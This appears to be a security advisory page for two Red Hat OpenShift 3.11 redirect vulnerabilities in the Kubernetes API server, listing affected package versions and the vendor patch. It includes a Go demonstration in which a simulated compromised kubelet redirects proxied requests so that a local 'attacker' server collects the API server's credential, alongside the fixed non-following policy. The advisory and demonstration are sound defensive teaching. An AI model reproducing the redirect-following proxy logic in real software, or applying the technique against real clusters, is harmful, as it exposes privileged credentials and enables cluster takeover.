Multiple vulnerabilities in OpenShift Container Platform

Published: 2020-12-18
Risk Medium
Patch available YES
Number of vulnerabilities 2
CVE-ID CVE-2018-1002102
CVE-2020-8559
CWE-ID CWE-601
CWE-264
Exploitation vector Network
Public exploit Public exploit code for vulnerability #2 is available.
Vulnerable software
openshift-kuryr (Red Hat package)
Operating systems & Components / Operating system package or component

openshift-enterprise-cluster-capacity (Red Hat package)
Operating systems & Components / Operating system package or component

openshift-enterprise-autoheal (Red Hat package)
Operating systems & Components / Operating system package or component

openshift-ansible (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-prometheus-prometheus (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-prometheus-node_exporter (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-prometheus-alertmanager (Red Hat package)
Operating systems & Components / Operating system package or component

golang-github-openshift-oauth-proxy (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-service-idler (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-node-problem-detector (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-metrics-server (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-dockerregistry (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-descheduler (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-cluster-autoscaler (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-enterprise-service-catalog (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift-web-console (Red Hat package)
Operating systems & Components / Operating system package or component

atomic-openshift (Red Hat package)
Operating systems & Components / Operating system package or component

Red Hat OpenShift Container Platform
Client/Desktop applications / Software for system administration

Vendor Red Hat Inc.

Security Bulletin

This security bulletin contains information about 2 vulnerabilities.

1) Open redirect

EUVDB-ID: #VU35005

Risk: Low

CVSSv3.1: 2.3 [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:U/RL:O/RC:C]

CVE-ID: CVE-2018-1002102

CWE-ID: CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')

Exploit availability: No

Description

The vulnerability allows a remote privileged user, one who controls a Kubelet, to gain access to sensitive information.

Improper validation of URL redirection in the Kubernetes API server in versions prior to v1.14.0 allows an attacker-controlled Kubelet to redirect API server requests from streaming endpoints (exec, attach, port-forward) to arbitrary hosts. An impacted API server follows the redirect as a GET request and authenticates to the redirect target with the client-certificate credentials it uses for the Kubelet, so a compromised node can make the API server present its Kubelet client credentials to any host the attacker names.

Mitigation

Install the updated packages from the vendor (RHSA-2020:5363, OpenShift Container Platform 3.11.343).

Vulnerable software versions

openshift-kuryr (Red Hat package): 3.11.153-1.git.1.073ef06.el7 - 3.11.248-1.git.1.f90c804.el7

openshift-enterprise-cluster-capacity (Red Hat package): 3.11.16-1.git.380.1406f2f.el7 - 3.11.248-1.git.1.37b107c.el7

openshift-enterprise-autoheal (Red Hat package): 3.11.16-1.git.219.5443970.el7 - 3.11.248-1.git.1.0020348.el7

openshift-ansible (Red Hat package): 3.11.16-1.git.0.4ac6f81.el7 - 3.11.248-1.git.0.fd212c7.el7

golang-github-prometheus-prometheus (Red Hat package): 3.11.16-1.git.5020.5e81ed1.el7 - 3.11.248-1.git.1.ad54f5b.el7

golang-github-prometheus-node_exporter (Red Hat package): 3.11.16-1.git.1056.1583d2a.el7 - 3.11.248-1.git.1.32f87fc.el7

golang-github-prometheus-alertmanager (Red Hat package): 3.11.16-1.git.0.be735ec.el7 - 3.11.248-1.git.1.66abd18.el7

golang-github-openshift-oauth-proxy (Red Hat package): 3.11.16-1.git.409.922769e.el7 - 3.11.248-1.git.1.9885abb.el7

atomic-openshift-service-idler (Red Hat package): 3.11.16-1.git.14.a65cbf0.el7 - 3.11.248-1.git.1.4c42a90.el7

atomic-openshift-node-problem-detector (Red Hat package): 3.11.16-1.git.198.95f4dfa.el7 - 3.11.248-1.git.1.628ff22.el7

atomic-openshift-metrics-server (Red Hat package): 3.11.16-1.git.52.9fd74a8.el7 - 3.11.248-1.git.1.b53e0e3.el7

atomic-openshift-dockerregistry (Red Hat package): 3.11.51-1.git.446.d29ce0e.el7 - 3.11.248-1.git.1.bb4a1fc.el7

atomic-openshift-descheduler (Red Hat package): 3.11.16-1.git.300.abfab3c.el7 - 3.11.248-1.git.1.108ef32.el7

atomic-openshift-cluster-autoscaler (Red Hat package): 3.11.16-1.git.0.8c8305e.el7 - 3.11.248-1.git.1.b5530f6.el7

atomic-enterprise-service-catalog (Red Hat package): 3.11.16-1.git.1633.05087cb.el7 - 3.11.248-1.git.1.9aad2ef.el7

atomic-openshift-web-console (Red Hat package): 3.11.16-1.git.289.ecf7441.el7 - 3.11.219-1.git.1.9b9b889.el7

atomic-openshift (Red Hat package): 3.11.16-1.git.0.b48b8f8.el7 - 3.11.219-1.git.0.0c21387.el7

Red Hat OpenShift Container Platform: before 3.11.343

External links

http://access.redhat.com/errata/RHSA-2020:5363


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated privileged user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

2) Permissions, Privileges, and Access Controls

EUVDB-ID: #VU34130

Risk: Medium

CVSSv3.1: 5.8 [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N/E:P/RL:O/RC:C]

CVE-ID: CVE-2020-8559

CWE-ID: CWE-264 - Permissions, Privileges, and Access Controls

Exploit availability: Yes

Description

The vulnerability allows a remote authenticated user who has compromised a node to escalate privileges within the cluster.

The Kubernetes kube-apiserver in versions v1.6-v1.15, and in versions prior to v1.16.13, v1.17.9 and v1.18.6, is vulnerable to an unvalidated redirect on proxied upgrade requests. An attacker who can answer the API server's proxied requests from a compromised node can send a redirect that the API server follows using the credentials of the original request, reaching other nodes' Kubelets and escalating from a node compromise to a full cluster compromise. OpenShift Container Platform 3.11 ships a kube-apiserver based on Kubernetes 1.11 and therefore falls within the affected range.
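Both entries in this bulletin come down to one pattern: a component that proxies requests on behalf of clients follows an HTTP redirect returned by a backend it should not trust (a Kubelet) and re-sends the request, credentials attached, to wherever the redirect points. The Go program below is an added illustration of that pattern and of the fix, written for this page; it is not code from the bulletin, from Kubernetes or from Red Hat. Two local test servers stand in for a compromised Kubelet and the attacker's host, and the header X-Apiserver-Credential, the exec path and the credential string are assumptions of the example that stand in for the API server's Kubelet client certificate. The only difference between the vulnerable and the hardened run is whether the proxy follows the Kubelet's redirect.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"sync"
)

// collector stands in for the attacker's host: it records the credential
// carried by every request that is misdirected to it.
type collector struct {
	mu    sync.Mutex
	creds []string
}

func (c *collector) handler(w http.ResponseWriter, r *http.Request) {
	c.mu.Lock()
	c.creds = append(c.creds, r.Header.Get("X-Apiserver-Credential"))
	c.mu.Unlock()
	w.WriteHeader(http.StatusOK)
}

// maliciousKubelet answers every streaming request with a 302 to the
// attacker's host, as a compromised node could in the vulnerable versions.
func maliciousKubelet(attackerURL string) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		http.Redirect(w, r, attackerURL+r.URL.Path, http.StatusFound)
	}
}

// forwardToKubelet models the API server proxying an exec request to a
// kubelet. Redirect handling is done by hand so that the two policies are
// explicit: followRedirects=true re-sends the request, credential attached,
// to whatever Location the kubelet returned (the vulnerable behaviour);
// false hands the 3xx back as an error instead of following it (the fix).
// X-Apiserver-Credential is an assumption of this example standing in for
// the API server's kubelet client certificate.
func forwardToKubelet(kubeletURL, credential string, followRedirects bool) (int, error) {
	client := &http.Client{
		// Never let net/http follow redirects on its own; the loop decides.
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
	target := kubeletURL + "/exec/default/shell/sh"
	for hop := 0; hop < 3; hop++ {
		req, err := http.NewRequest(http.MethodGet, target, nil)
		if err != nil {
			return 0, err
		}
		req.Header.Set("X-Apiserver-Credential", credential)
		resp, err := client.Do(req)
		if err != nil {
			return 0, err
		}
		_, _ = io.Copy(io.Discard, resp.Body)
		resp.Body.Close()
		if resp.StatusCode < 300 || resp.StatusCode > 399 {
			return resp.StatusCode, nil
		}
		loc := resp.Header.Get("Location")
		if !followRedirects {
			return resp.StatusCode, fmt.Errorf("kubelet answered %d with Location %q; refusing to follow", resp.StatusCode, loc)
		}
		target = loc // vulnerable: trust the backend and re-send with the credential
	}
	return 0, errors.New("too many redirects")
}

// runAttack stands up a malicious kubelet and an attacker collector, proxies
// one request under the given policy, and returns how many times the
// attacker received the API server's credential.
func runAttack(followRedirects bool) (int, error) {
	c := &collector{}
	attacker := httptest.NewServer(http.HandlerFunc(c.handler))
	defer attacker.Close()
	kubelet := httptest.NewServer(maliciousKubelet(attacker.URL))
	defer kubelet.Close()

	_, err := forwardToKubelet(kubelet.URL, "apiserver-kubelet-client-cert", followRedirects)
	c.mu.Lock()
	defer c.mu.Unlock()
	return len(c.creds), err
}

func main() {
	for _, follow := range []bool{true, false} {
		leaked, err := runAttack(follow)
		fmt.Printf("followRedirects=%-5v leaked=%d err=%v\n", follow, leaked, err)
	}
}
```

With followRedirects=true the attacker's collector receives the credential once; with it set to false the proxy stops at the 302 and the collector receives nothing. The hardened branch is the policy the fixed releases adopt: a proxy that holds privileged credentials for a backend must not let that backend choose a new destination for them.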

Mitigation

Install the updated packages from the vendor (RHSA-2020:5363, OpenShift Container Platform 3.11.343).

Vulnerable software versions

openshift-kuryr (Red Hat package): 3.11.153-1.git.1.073ef06.el7 - 3.11.248-1.git.1.f90c804.el7

openshift-enterprise-cluster-capacity (Red Hat package): 3.11.16-1.git.380.1406f2f.el7 - 3.11.248-1.git.1.37b107c.el7

openshift-enterprise-autoheal (Red Hat package): 3.11.16-1.git.219.5443970.el7 - 3.11.248-1.git.1.0020348.el7

openshift-ansible (Red Hat package): 3.11.16-1.git.0.4ac6f81.el7 - 3.11.248-1.git.0.fd212c7.el7

golang-github-prometheus-prometheus (Red Hat package): 3.11.16-1.git.5020.5e81ed1.el7 - 3.11.248-1.git.1.ad54f5b.el7

golang-github-prometheus-node_exporter (Red Hat package): 3.11.16-1.git.1056.1583d2a.el7 - 3.11.248-1.git.1.32f87fc.el7

golang-github-prometheus-alertmanager (Red Hat package): 3.11.16-1.git.0.be735ec.el7 - 3.11.248-1.git.1.66abd18.el7

golang-github-openshift-oauth-proxy (Red Hat package): 3.11.16-1.git.409.922769e.el7 - 3.11.248-1.git.1.9885abb.el7

atomic-openshift-service-idler (Red Hat package): 3.11.16-1.git.14.a65cbf0.el7 - 3.11.248-1.git.1.4c42a90.el7

atomic-openshift-node-problem-detector (Red Hat package): 3.11.16-1.git.198.95f4dfa.el7 - 3.11.248-1.git.1.628ff22.el7

atomic-openshift-metrics-server (Red Hat package): 3.11.16-1.git.52.9fd74a8.el7 - 3.11.248-1.git.1.b53e0e3.el7

atomic-openshift-dockerregistry (Red Hat package): 3.11.51-1.git.446.d29ce0e.el7 - 3.11.248-1.git.1.bb4a1fc.el7

atomic-openshift-descheduler (Red Hat package): 3.11.16-1.git.300.abfab3c.el7 - 3.11.248-1.git.1.108ef32.el7

atomic-openshift-cluster-autoscaler (Red Hat package): 3.11.16-1.git.0.8c8305e.el7 - 3.11.248-1.git.1.b5530f6.el7

atomic-enterprise-service-catalog (Red Hat package): 3.11.16-1.git.1633.05087cb.el7 - 3.11.248-1.git.1.9aad2ef.el7

atomic-openshift-web-console (Red Hat package): 3.11.16-1.git.289.ecf7441.el7 - 3.11.219-1.git.1.9b9b889.el7

atomic-openshift (Red Hat package): 3.11.16-1.git.0.b48b8f8.el7 - 3.11.219-1.git.0.0c21387.el7

Red Hat OpenShift Container Platform: before 3.11.343

External links

http://access.redhat.com/errata/RHSA-2020:5363


Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote authenticated user via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability. However, a proof of concept for this vulnerability is publicly available.
